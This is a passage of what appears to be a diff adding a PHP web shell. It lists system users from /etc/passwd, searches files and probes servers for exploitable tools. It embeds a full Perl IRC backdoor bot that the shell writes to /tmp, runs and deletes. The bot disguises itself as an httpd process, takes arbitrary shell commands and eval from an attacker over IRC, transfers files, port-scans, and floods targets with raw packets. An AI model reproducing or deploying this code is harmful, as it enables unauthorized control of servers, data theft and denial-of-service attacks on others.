";
+$table_up3 = "";
+$table_end1 = " 4 ";
+$lb = "[ ";
+$rb = "] ";
+$font = "";
+$ts = "";
+$fs = "";
+
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users('/etc/passwd')) { echo " ".$lang[$language.'_text96']." ';
+ foreach($users as $user) { echo $user." ';
+ }
+ echo "";
+ foreach($res as $file=>$v)
+ {
+ $r .= "";
+ $r .= "".ws(3);
+ $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+ $r .= " ";
+ foreach($v as $a=>$b)
+ {
+ $r .= "";
+ $r .= "".$a." ".ws(2).$b." \n";
+ }
+ }
+ $r .= "
";
+ echo $r;
+ }
+ else
+ {
+ echo "".$lang[$language.'_text56']."
";
+ }
+ echo "';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '
';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "".$t1." ".$t2." FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+ $this->text = $text;
+ $this->FilesTotal = @count($this->FilesToSearch);
+ $this->TimeStart = getmicrotime();
+ $this->MatchesCount = 0;
+ $this->ResultFiles = Array();
+ $this->FileMatchesCount = Array();
+ $this->titles = Array();
+ }
+ function GetFilesTotal() { return $this->FilesTotal; }
+ function GetTitles() { return $this->titles; }
+ function GetTimeTotal() { return $this->TimeTotal; }
+ function GetMatchesCount() { return $this->MatchesCount; }
+ function GetFileMatchesCount() { return $this->FileMatchesCount; }
+ function GetResultFiles() { return $this->ResultFiles; }
+ function SearchText($phrase=0,$case=0) {
+ $qq = @explode(' ',$this->text);
+ $delim = '|';
+ if($phrase)
+ foreach($qq as $k=>$v)
+ $qq[$k] = '\b'.$v.'\b';
+ $words = '('.@implode($delim,$qq).')';
+ $pattern = "/".$words."/";
+ if(!$case)
+ $pattern .= 'i';
+ foreach($this->FilesToSearch as $k=>$filename)
+ {
+ $this->FileMatchesCount[$filename] = 0;
+ $FileStrings = @file($filename) or @next;
+ for($a=0;$a<@count($FileStrings);$a++)
+ {
+ $count = 0;
+ $CurString = $FileStrings[$a];
+ $CurString = @Trim($CurString);
+ $CurString = @strip_tags($CurString);
+ $aa = '';
+ if(($count = @preg_match_all($pattern,$CurString,$aa)))
+ {
+ $CurString = @preg_replace($pattern,"\\1 OverclockiX Shell-Connector || Connecting to $ircserver<title>";
+echo "<body bgcolor=\"black\" text=\"green\">";
+echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>";
+echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>";
+#######################################################
+######################IRC Trojan##########################
+$file="
+################ CONFIGURACAO #################################################################
+my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
+#----------------------------------------------################################################
+my \$linas_max='48'; # Evita o flood :) depois de X linhas #
+#----------------------------------------------################################################
+my \$sleep='4'; # ele dorme X segundos #
+##################### IRC #####################################################################
+my @adms=(\"$ircadmin\"); # Nick do administrador #
+#----------------------------------------------################################################
+my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") #
+#----------------------------------------------################################################
+my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer #
+ # aparecer com numero radonamico no final #
+#----------------------------------------------################################################
+my \$ircname = 'Linux'; # User ID #
+#----------------------------------------------################################################
+chop (my \$realname = `uname -a`); # Full Name #
+#----------------------------------------------################################################
+\$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado #
+ # caso n?o seja especificado no argumento #
+#----------------------------------------------################################################
+my \$porta='6667'; # Porta do servidor de irc #
+################ ACESSO A SHELL ###############################################################
+my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
+###############################################################################################
+my \$VERSAO = '0.2';
+\$SIG{'INT'} = 'IGNORE';
+\$SIG{'HUP'} = 'IGNORE';
+\$SIG{'TERM'} = 'IGNORE';
+\$SIG{'CHLD'} = 'IGNORE';
+\$SIG{'PS'} = 'IGNORE';
+\$SIG{'STOP'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir(\"/\");
+\$servidor=\"\$ARGV[0]\" if \$ARGV[0];
+$0=\"\$processo\".\"\0\"x16;;
+my \$pid=fork;
+exit if \$pid;
+die \"Problema com o fork: $!\" unless defined(\$pid);
+my \$dcc_sel = new IO::Select->new();
+#############################
+# B0tchZ na veia ehehe :P #
+#############################
+
+
+\$sel_cliente = IO::Select->new();
+sub sendraw {
+ if ($#_ == '1') {
+ my \$socket = \$_[0];
+ print \$socket \"\$_[1]\\n\";
+ } else {
+ print \$IRC_cur_socket \"\$_[0]\\n\";
+ }
+}
+#################################
+sub conectar {
+ my \$meunick = \$_[0];
+ my \$servidor_con = \$_[1];
+ my \$porta_con = \$_[2];
+
+
+ my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1);
+ if (defined(\$IRC_socket)) {
+ \$IRC_cur_socket = \$IRC_socket;
+
+
+ \$IRC_socket->autoflush(1);
+ \$sel_cliente->add(\$IRC_socket);
+
+
+ \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\";
+ \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\";
+ \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
+ \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost;
+ nick(\"\$meunick\");
+ sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\");
+ sleep 1;
+ }
+} #####################
+
+
+my \$line_temp;
+while( 1 ) {
+ while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); }
+ delete(\$irc_servers{''}) if (defined(\$irc_servers{''}));
+ &DCC::connections;
+ my @ready = \$sel_cliente->can_read(0);
+ next unless(@ready);
+ foreach \$fh (@ready) {
+ \$IRC_cur_socket = \$fh;
+ \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'};
+ \$nread = sysread(\$fh, \$msg, 4096);
+ if (\$nread == 0) {
+ \$sel_cliente->remove(\$fh);
+ \$fh->close;
+ delete(\$irc_servers{\$fh});
+ }
+ @lines = split (/\\n/, \$msg);
+
+
+ for(my \$c=0; \$c<= $#lines; \$c++) {
+ \$line = \$lines[\$c];
+ \$line=\$line_temp.\$line if (\$line_temp);
+ \$line_temp='';
+ \$line =~ s/\\r$//;
+ unless (\$c == $#lines) {
+ parse(\"\$line\");
+ } else {
+ if ($#lines == 0) {
+ parse(\"\$line\");
+ } elsif (\$lines[\$c] =~ /\\r$/) {
+ parse(\"\$line\");
+ } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+ parse(\"\$line\");
+ } else {
+ \$line_temp = \$line;
+ }
+ }
+ }
+ }
+}
+
+
+#########################
+
+
+
+
+sub parse {
+ my \$servarg = shift;
+ if (\$servarg =~ /^PING \:(.*)/) {
+ sendraw(\"PONG :$1\");
+ } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+ my \$pn=$1; my \$onde = $4; my \$args = $5;
+ if (\$args =~ /^\\001VERSION\\001$/) {
+ notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\");
+ }
+ if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) {
+ if (\$onde eq \"\$meunick\"){
+ shell(\"\$pn\", \"\$args\");
+ }
+ if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) {
+ my \$natrix = $1;
+ my \$arg = $2;
+ if (\$arg =~ /^\!(.*)/) {
+ ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/);
+ } elsif (\$arg =~ /^\@(.*)/) {
+ \$ondep = \$onde;
+ \$ondep = \$pn if \$onde eq \$meunick;
+ bfunc(\"\$ondep\",\"$1\");
+ } else {
+ shell(\"\$onde\", \"\$arg\");
+ }
+ }
+ }
+ } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+ if (lc($1) eq lc(\$meunick)) {
+ \$meunick=$4;
+ \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
+ }
+ } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) {
+ nick(\"\$meunick\".int rand(9999));
+ } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+ \$meunick = $2;
+ \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
+ \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\";
+ foreach my \$canal (@canais) {
+ sendraw(\"JOIN \$canal\");
+ }
+ }
+}
+##########################
+
+
+sub bfunc {
+ my \$printl = \$_[0];
+ my \$funcarg = \$_[1];
+ if (my \$pid = fork) {
+ waitpid(\$pid, 0);
+ } else {
+ if (fork) {
+ exit;
+ } else {
+ if (\$funcarg =~ /^portscan (.*)/) {
+ my \$hostip=\"$1\";
+ my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");
+ my (@aberta, %porta_banner);
+ foreach my \$porta (@portas) {
+ my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4);
+ if (\$scansock) {
+ push (@aberta, \$porta);
+ \$scansock->close;
+ }
+ }
+
+
+ if (@aberta) {
+ sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\");
+ } else {
+ sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\");
+ }
+ }
+ if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
+ my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\");
+ \$dtime = 1 if \$dtime == 0;
+ my %bytes;
+ \$bytes{igmp} = $2 * \$pacotes{igmp};
+ \$bytes{icmp} = $2 * \$pacotes{icmp};
+ \$bytes{o} = $2 * \$pacotes{o};
+ \$bytes{udp} = $2 * \$pacotes{udp};
+ \$bytes{tcp} = $2 * \$pacotes{tcp};
+
+
+ sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\");
+ sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\");
+ sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o}));
+ sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o}));
+ sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Media de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\");
+
+
+ }
+ exit;
+ }
+ }
+}
+##########################
+
+
+
+
+sub ircase {
+ my (\$kem, \$printl, \$case) = @_;
+
+
+
+
+ if (\$case =~ /^join (.*)/) {
+ j(\"$1\");
+ }
+ if (\$case =~ /^part (.*)/) {
+ p(\"$1\");
+ }
+ if (\$case =~ /^rejoin\s+(.*)/) {
+ my \$chan = $1;
+ if (\$chan =~ /^(\d+) (.*)/) {
+ for (my \$ca = 1; \$ca <= $1; \$ca++ ) {
+ p(\"$2\");
+ j(\"$2\");
+ }
+ } else {
+ p(\"\$chan\");
+ j(\"\$chan\");
+ }
+ }
+ if (\$case =~ /^op/) {
+ op(\"\$printl\", \"\$kem\") if \$case eq \"op\";
+ my \$oarg = substr(\$case, 3);
+ op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
+ }
+ if (\$case =~ /^deop/) {
+ deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\";
+ my \$oarg = substr(\$case, 5);
+ deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
+ }
+ if (\$case =~ /^voice/) {
+ voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\";
+ \$oarg = substr(\$case, 6);
+ voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
+ }
+ if (\$case =~ /^devoice/) {
+ devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\";
+ \$oarg = substr(\$case, 8);
+ devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
+ }
+ if (\$case =~ /^msg\s+(\S+) (.*)/) {
+ msg(\"$1\", \"$2\");
+ }
+ if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+ for (my \$cf = 1; \$cf <= $1; \$cf++) {
+ msg(\"$2\", \"$3\");
+ }
+ }
+ if (\$case =~ /^ctcp\s+(\S+) (.*)/) {
+ ctcp(\"$1\", \"$2\");
+ }
+ if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+ for (my \$cf = 1; \$cf <= $1; \$cf++) {
+ ctcp(\"$2\", \"$3\");
+ }
+ }
+ if (\$case =~ /^invite\s+(\S+) (.*)/) {
+ invite(\"$1\", \"$2\");
+ }
+ if (\$case =~ /^nick (.*)/) {
+ nick(\"$1\");
+ }
+ if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+ conectar(\"$2\", \"$1\", 6667);
+ }
+ if (\$case =~ /^send\s+(\S+)\s+(\S+)/) {
+ DCC::SEND(\"$1\", \"$2\");
+ }
+ if (\$case =~ /^raw (.*)/) {
+ sendraw(\"$1\");
+ }
+ if (\$case =~ /^eval (.*)/) {
+ eval \"$1\";
+ }
+}
+##########################
+
+
+sub shell {
+ return unless \$secv;
+ my \$printl=\$_[0];
+ my \$comando=\$_[1];
+ if (\$comando =~ /cd (.*)/) {
+ chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \");
+ return;
+ }
+ elsif (\$pid = fork) {
+ waitpid(\$pid, 0);
+ } else {
+ if (fork) {
+ exit;
+ } else {
+ my @resp=`\$comando 2>&1 3>&1`;
+ my \$c=0;
+ foreach my \$linha (@resp) {
+ \$c++;
+ chop \$linha;
+ sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\");
+ if (\$c == \"\$linas_max\") {
+ \$c=0;
+ sleep \$sleep;
+ }
+ }
+ exit;
+ }
+ }
+}
+
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+ my \$iaddr = inet_aton(\$_[0]);
+ my \$msg = 'B' x \$_[1];
+ my \$ftime = \$_[2];
+ my \$cp = 0;
+ my (%pacotes);
+ \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0;
+
+
+ socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++;
+ socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++;
+ socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++;
+ socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++;
+ return(undef) if \$cp == 4;
+ my \$itime = time;
+ my (\$cur_time);
+ while ( 1 ) {
+ for (my \$porta = 1; \$porta <= 65535; \$porta++) {
+ \$cur_time = time - \$itime;
+ last if \$cur_time >= \$ftime;
+ send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++;
+ send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++;
+ send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++;
+ send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++;
+
+
+ # DoS ?? :P
+ for (my \$pc = 3; \$pc <= 255;\$pc++) {
+ next if \$pc == 6;
+ \$cur_time = time - \$itime;
+ last if \$cur_time >= \$ftime;
+ socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next;
+ send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;;
+ }
+ }
+ last if \$cur_time >= \$ftime;
+ }
+ return(\$cur_time, %pacotes);
+}
+
+
+#############
+# ALIASES #
+#############
+
+
+sub action {
+ return unless $#_ == 1;
+ sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\");
+}
+
+
+sub ctcp {
+ return unless $#_ == 1;
+ sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\");
+}
+sub msg {
+ return unless $#_ == 1;
+ sendraw(\"PRIVMSG \$_[0] :\$_[1]\");
+}
+
+
+sub notice {
+ return unless $#_ == 1;
+ sendraw(\"NOTICE \$_[0] :\$_[1]\");
+}
+
+
+sub op {
+ return unless $#_ == 1;
+ sendraw(\"MODE \$_[0] +o \$_[1]\");
+}
+sub deop {
+ return unless $#_ == 1;
+ sendraw(\"MODE \$_[0] -o \$_[1]\");
+}
+sub hop {
+ return unless $#_ == 1;
+ sendraw(\"MODE \$_[0] +h \$_[1]\");
+}
+sub dehop {
+ return unless $#_ == 1;
+ sendraw(\"MODE \$_[0] +h \$_[1]\");
+}
+sub voice {
+ return unless $#_ == 1;
+ sendraw(\"MODE \$_[0] +v \$_[1]\");
+}
+sub devoice {
+ return unless $#_ == 1;
+ sendraw(\"MODE \$_[0] -v \$_[1]\");
+}
+sub ban {
+ return unless $#_ == 1;
+ sendraw(\"MODE \$_[0] +b \$_[1]\");
+}
+sub unban {
+ return unless $#_ == 1;
+ sendraw(\"MODE \$_[0] -b \$_[1]\");
+}
+sub kick {
+ return unless $#_ == 1;
+ sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\");
+}
+
+
+sub modo {
+ return unless $#_ == 0;
+ sendraw(\"MODE \$_[0] \$_[1]\");
+}
+sub mode { modo(@_); }
+
+
+sub j { &join(@_); }
+sub join {
+ return unless $#_ == 0;
+ sendraw(\"JOIN \$_[0]\");
+}
+sub p { part(@_); }
+sub part {sendraw(\"PART \$_[0]\");}
+
+
+sub nick {
+ return unless $#_ == 0;
+ sendraw(\"NICK \$_[0]\");
+}
+
+
+sub invite {
+ return unless $#_ == 1;
+ sendraw(\"INVITE \$_[1] \$_[0]\");
+}
+sub topico {
+ return unless $#_ == 1;
+ sendraw(\"TOPIC \$_[0] \$_[1]\");
+}
+sub topic { topico(@_); }
+
+
+sub whois {
+ return unless $#_ == 0;
+ sendraw(\"WHOIS \$_[0]\");
+}
+sub who {
+ return unless $#_ == 0;
+ sendraw(\"WHO \$_[0]\");
+}
+sub names {
+ return unless $#_ == 0;
+ sendraw(\"NAMES \$_[0]\");
+}
+sub away {
+ sendraw(\"AWAY \$_[0]\");
+}
+sub back { away(); }
+sub quit {
+ sendraw(\"QUIT :\$_[0]\");
+}
+
+
+# DCC
+#########################
+
+
+package DCC;
+
+
+sub connections {
+ my @ready = \$dcc_sel->can_read(1);
+# return unless (@ready);
+ foreach my \$fh (@ready) {
+ my \$dcctipo = \$DCC{\$fh}{tipo};
+ my \$arquivo = \$DCC{\$fh}{arquivo};
+ my \$bytes = \$DCC{\$fh}{bytes};
+ my \$cur_byte = \$DCC{\$fh}{curbyte};
+ my \$nick = \$DCC{\$fh}{nick};
+
+
+
+
+ my \$msg;
+ my \$nread = sysread(\$fh, \$msg, 10240);
+
+
+ if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) {
+ \$DCC{\$fh}{status} = \"Cancelado\";
+ \$DCC{\$fh}{ftime} = time;
+ \$dcc_sel->remove(\$fh);
+ \$fh->close;
+ next;
+ }
+
+
+ if (\$dcctipo eq \"get\") {
+ \$DCC{\$fh}{curbyte} += length(\$msg);
+
+
+ my \$cur_byte = \$DCC{\$fh}{curbyte};
+
+
+ open(FILE, \">> \$arquivo\");
+ print FILE \"\$msg\" if (\$cur_byte <= \$bytes);
+ close(FILE);
+
+
+ my \$packbyte = pack(\"N\", \$cur_byte);
+ print \$fh \"\$packbyte\";
+
+
+
+
+ if (\$bytes == \$cur_byte) {
+ \$dcc_sel->remove(\$fh);
+ \$fh->close;
+ \$DCC{\$fh}{status} = \"Recebido\";
+ \$DCC{\$fh}{ftime} = time;
+ next;
+ }
+ } elsif (\$dcctipo eq \"send\") {
+ my \$send = \$fh->accept;
+ \$send->autoflush(1);
+ \$dcc_sel->add(\$send);
+ \$dcc_sel->remove(\$fh);
+ \$DCC{\$send}{tipo} = 'sendcon';
+ \$DCC{\$send}{itime} = time;
+ \$DCC{\$send}{nick} = \$nick;
+ \$DCC{\$send}{bytes} = \$bytes;
+ \$DCC{\$send}{curbyte} = 0;
+ \$DCC{\$send}{arquivo} = \$arquivo;
+ \$DCC{\$send}{ip} = \$send->peerhost;
+ \$DCC{\$send}{porta} = \$send->peerport;
+ \$DCC{\$send}{status} = \"Enviando\";
+ #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+ open(FILE, \"< \$arquivo\");
+ my \$fbytes;
+ read(FILE, \$fbytes, 1024);
+ print \$send \"\$fbytes\";
+ close FILE;
+# delete(\$DCC{\$fh});
+} elsif (\$dcctipo eq 'sendcon') {
+ my \$bytes_sended = unpack(\"N\", \$msg);
+ \$DCC{\$fh}{curbyte} = \$bytes_sended;
+ if (\$bytes_sended == \$bytes) {
+ \$fh->close;
+ \$dcc_sel->remove(\$fh);
+ \$DCC{\$fh}{status} = \"Enviado\";
+ \$DCC{\$fh}{ftime} = time;
+ next;
+ }
+ open(SENDFILE, \"< \$arquivo\");
+ seek(SENDFILE, \$bytes_sended, 0);
+ my \$send_bytes;
+ read(SENDFILE, \$send_bytes, 1024);
+ print \$fh \"\$send_bytes\";
+ close(SENDFILE);
+ }
+ }
+}
+##########################
+
+
+sub SEND {
+ my (\$nick, \$arquivo) = @_;
+ unless (-r \"\$arquivo\") {
+ return(0);
+ }
+
+
+ my \$dccark = \$arquivo;
+ \$dccark =~ s/[.*\/](\S+)/$1/;
+
+
+ my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'};
+ my \$longip = unpack(\"N\",inet_aton(\$meuip));
+
+
+ my @filestat = stat(\$arquivo);
+ my \$size_total=\$filestat[7];
+ if (\$size_total == 0) {
+ return(0);
+ }
+
+
+ my (\$porta, \$sendsock);
+ do {
+ \$porta = int rand(64511);
+ \$porta += 1024;
+ \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock);
+ } until \$sendsock;
+
+
+ \$DCC{\$sendsock}{tipo} = 'send';
+ \$DCC{\$sendsock}{nick} = \$nick;
+ \$DCC{\$sendsock}{bytes} = \$size_total;
+ \$DCC{\$sendsock}{arquivo} = \$arquivo;
+
+
+ &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\");
+
+
+}
+
+
+sub GET {
+ my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_;
+ return(0) if (-e \"\$arquivo\");
+ if (open(FILE, \"> \$arquivo\")) {
+ close FILE;
+ } else {
+ return(0);
+ }
+
+
+ my \$dccip=fixaddr(\$dcclongip);
+ return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1);
+ my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0);
+ \$dccsock->autoflush(1);
+ \$dcc_sel->add(\$dccsock);
+ \$DCC{\$dccsock}{tipo} = 'get';
+ \$DCC{\$dccsock}{itime} = time;
+ \$DCC{\$dccsock}{nick} = \$nick;
+ \$DCC{\$dccsock}{bytes} = \$bytes;
+ \$DCC{\$dccsock}{curbyte} = 0;
+ \$DCC{\$dccsock}{arquivo} = \$arquivo;
+ \$DCC{\$dccsock}{ip} = \$dccip;
+ \$DCC{\$dccsock}{porta} = \$dccporta;
+ \$DCC{\$dccsock}{status} = \"Recebendo\";
+}
+############################
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+ my \$socket = shift;
+ my \$sock_tipo = \$DCC{\$socket}{tipo};
+ unless (lc(\$sock_tipo) eq \"chat\") {
+ my \$nick = \$DCC{\$socket}{nick};
+ my \$arquivo = \$DCC{\$socket}{arquivo};
+ my \$itime = \$DCC{\$socket}{itime};
+ my \$ftime = time;
+ my \$status = \$DCC{\$socket}{status};
+ \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime});
+
+
+ my \$d_time = \$ftime-\$itime;
+
+
+ my \$cur_byte = \$DCC{\$socket}{curbyte};
+ my \$bytes_total = \$DCC{\$socket}{bytes};
+
+
+ my \$rate = 0;
+ \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0;
+ my \$porcen = (\$cur_byte*100)/\$bytes_total;
+
+
+ my (\$r_duv, \$p_duv);
+ if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+ \$r_duv = $3; \$r_duv++ if $4 >= 5;
+ \$rate = \"$1\.$2\".\"\$r_duv\";
+ }
+ if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+ \$p_duv = $3; \$p_duv++ if $4 >= 5;
+ \$porcen = \"$1\.$2\".\"\$p_duv\";
+ }
+ return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\");
+ }
+
+
+ return(0);
+}
+
+
+# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+ my (\$address) = @_;
+
+
+ chomp \$address; # just in case, sigh.
+ if (\$address =~ /^\d+$/) {
+ return inet_ntoa(pack \"N\", \$address);
+ } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+ return \$address;
+ } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
+ return inet_ntoa(((gethostbyname(\$address))[4])[0]);
+ } else {
+ return;
+ }
+}
+############################
+";
+$bot = "/tmp/ircs.pl";
+$open = fopen($bot,"w");
+fputs($open,$file);
+fclose($open);
+$cmd="perl $bot";
+$cmd2="rm $bot";
+system($cmd);
+system($cmd2);
+$_POST['cmd']="echo \"Now script try connect to ircserver ...\"";
+
+
+}
+
+
+
+
+if(!isset($_COOKIE[$lang[$language.'_text137']])) {
+ $ust_u='';
+ if($unix && !$safe_mode){
+ foreach ($userful as $item) {
+ if(which($item)){$ust_u.=$item;}
+ }
+ }
+ if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
+ if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
+ if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
+ if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
+ if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
+ if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
+ if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
+ if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
+
+ $ust_u = trim($ust_u);
+}else {
+ $ust_u = trim($_COOKIE[$lang[$language.'_text137']]);
+}
+
+
+if(!isset($_COOKIE[$lang[$language.'_text138']])) {
+ $ust_d='';
+ if($unix && !$safe_mode){
+ foreach ($danger as $item) {
+ if(which($item)){$ust_d.=$item;}
+ }
+ }
+ if(!$safe_mode){
+ foreach ($danger as $item) {
+ if(ps($item)){$ust_d.=$item;}
+ }
+ }
+ if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";}
+ if(substr($ust_d,0,1)==",") {$ust_d[0]="";}
+
